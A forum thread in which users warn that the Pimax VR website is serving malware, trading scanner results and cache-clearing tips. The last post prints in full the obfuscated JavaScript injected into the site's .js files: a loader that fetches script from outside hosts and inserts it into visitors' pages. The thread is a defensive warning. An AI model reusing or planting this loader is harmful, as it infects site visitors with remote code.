PSA dont go to main pimax website right now


#1

posting here as well for visibility.

i know shop had issues before, but now even going to the main pimax page will throw up a severe risk intrusion attempt from norton. dont even go near it until pimax fixes this shit and releases a statement on it , and if you hand your payment details directly to pimax at this point you are an idiot.


#2

Is it HTTPS with valid certificates?


#3

im not clicking on it/going to it again.


#4

here is a copy of previous norton report

it goes without saying
https://www.virustotal.com/#/url/66e8ff237a6aca3d3e7c06838aa722f3d24f29405a742b92601662b5381ec551/detection


#5

I wonder if that is an older logged false/positive?

I tried the pimaxvr and pimax.com URL in this online checker and it comes up OK
https://www.virustotal.com/#/home/url


#6

Also tried this Norton URL checker: https://safeweb.norton.com

Which brings nothing up.


#7

dont know what to tell you , i went there, norton freaked out instantly, i posted result. if you want to go there, its up to you. im not .


#8

Run a program like ccleaner to clean up all the things downloaded by your browser as it may have cached some malicous code. If you use firefox/chrome you can instead do this on a per site basis: https://superuser.com/questions/173210/how-can-i-clear-a-single-site-from-the-cache-in-firefox/733154#733154


#9

thank you, have now done so.


#10

#11

Pinned this globally. Pimax csn unpin & close when fixed.


#12

Probably better to use a linux machine as it’s less vulnerable thsn windows.


#13

Let me know if should unpin.


#14

I think it would be wise to know the problem is outside just one report? I ran two external URL scanners on it and both said it was ok but I did not go there directly to test it as this is a work machine,


#15

I think it would be great to confirm it by more than one report. Send in the sacrifice. XD Of course if you treat it as being under same umbrella as the redirect attacks that have been happening for past few weeks then there have been multiple reports. i would also guess its literally the same thing, its just starting to be served on main page now.


#16

im probably going to have to buy a linux machine then. XD

this is my work pc (self employed) so im fucking skitterish about the whole domain now.


#17

Consider checking out Comodo Antivirus & Virtual box.


#18

Just checked the site again and it is still infected. I checked last night and notified pimax and helio.

The site is infected with malware.generic_jsobfuscator?1.2 in multiple locations mainly in .Js files.

Also the site has been blacklisted with 9 providers, which won’t be removed until the malware is removed.

I do not recommend visiting the site, or using the login button or visiting the PiPlay section of that site until it’s clean, as the malware is running on the Javascript on those pages and buttons also.

Eno


#19

Yep, you will need to clear your browser cache for pimax site as those js files are currently in your local files.

This is assuming that pimax simply uploaded the uninfected files, but forgot to mark them as a newer version hence your browser would reuse the previous, but infected files.


#20

the issue is not my browser, the issue is that the malware is still there.

securi site scan is one of the better website scanners. here are the results from the site scan for your reference.

https://sitecheck.sucuri.net/results/pimaxvr.com

clearing your browser will make no difference if the site itself is infected.

the code in the .js infection is here:

<head><script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))> -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>

and is in most of if not all of the .js files.